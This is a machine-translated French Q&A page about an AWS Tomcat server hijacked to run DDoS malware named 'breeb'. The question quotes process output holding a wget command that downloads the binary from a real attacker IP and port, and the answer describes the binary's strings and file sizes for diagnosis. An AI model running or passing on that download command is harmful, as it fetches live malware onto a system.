web-dev-qa-db-fra.com

Instance AWS EBS Tomcat piratée

J'utilise des instances AWS EBS avec Tomcat pour mon application Web Java. Mais d'une manière ou d'une autre, un type parvient à pirater mes instances et tout ce que je peux voir, ce sont ces processus exécutés par Tomcat:

Tomcat   26988  0.2  0.1 180304  2972 ?        S    11:18   0:00 wget http://220.133.87.149:49120/breeb
Tomcat    1898  0.0  0.0  75252   736 ?        Ssl  11:18   0:00 ./breeb

Ces processus envoient beaucoup de paquets aléatoires (en TB) en quelques minutes. L'adresse IP ( http://220.133.87.149:49120/ ) à partir de laquelle ces fichiers malveillants sont en cours de téléchargement contient de nombreux autres fichiers malveillants.

The site containing malicious files Quelqu'un at-il une idée, de quoi ai-je affaire? Vous trouverez ci-dessous les paramètres de sécurité pour les instances AWS:

Entrant: 

80  tcp 0.0.0.0/0
22  tcp 0.0.0.0/0

Sortant: 

 All traffic   All Protocol  All IPs
securityamazon-awstomcat
1
thekosmix

* THREAD PRIS DANS LES FORUMS AWS *

http://forums.aws.Amazon.com/thread.jspa?threadID=227061&tstart=

* THREAD PRIS DANS LES FORUMS AWS *


J'ai eu le même problème la semaine dernière:

Mon serveur Amazon a été en quelque sorte compromis. J'ai reçu un rapport d'abus de la part d'Amazon indiquant que mon serveur était utilisé dans une attaque DDOS sur un site Web.

Lorsque je me suis connecté, j'ai trouvé une application/usr/share/Tomcat7/breeb en cours d'exécution en mémoire. Je suppose que Tomcat 7 présente une faiblesse, ce qui signifie qu'un utilisateur distant est capable de télécharger un client de spam sur mon serveur et de l'exécuter en tant qu'utilisateur Tomcat. Très inquiétant.

Il me semble que l’application ‘breeb’ est écrite en c ++ et présente l’empreinte suivante

-rwxrwxrwx  1 Tomcat tomcat 1223123 Nov  7 23:54 breeb
-rw-r--r--  1 Tomcat tomcat 1223123 Nov  7 23:54 breeb.1
-rw-r--r--  1 Tomcat tomcat 1223123 Nov  7 23:54 breeb.2
-rw-r--r--  1 Tomcat tomcat 1223123 Nov  7 23:54 breeb.3

Certaines des classes c ++ sont un peu un cadeau:

[ec2-user tmp]$ strings breeb | grep .cpp
AmpResource.cpp
Attack.cpp
CmdMsg.cpp
ConfigDoing.cpp
DNSCache.cpp
ExChange.cpp
Global.cpp
Main.cpp
ThreadDoFun.cpp
...

Googler "linux backdoor 1223123", qui est la taille d'octet du client de spam, appelle de nombreuses alertes virales.

Les autres "chaînes" de l’application breeb compilée incluent une longue liste d’adresses IP, elles sont toutes chinoises et figurent dans de nombreux rapports de programmes malveillants.

Je n'arrive pas à obtenir une quelconque reconnaissance de ce problème sur les forums. Depuis, j'ai reconstruit le serveur mais avec Tomcat8 et je cours depuis quelques jours sans problèmes ... Ce serait bien de savoir quel était le vecteur d'attaque.

2
M.B.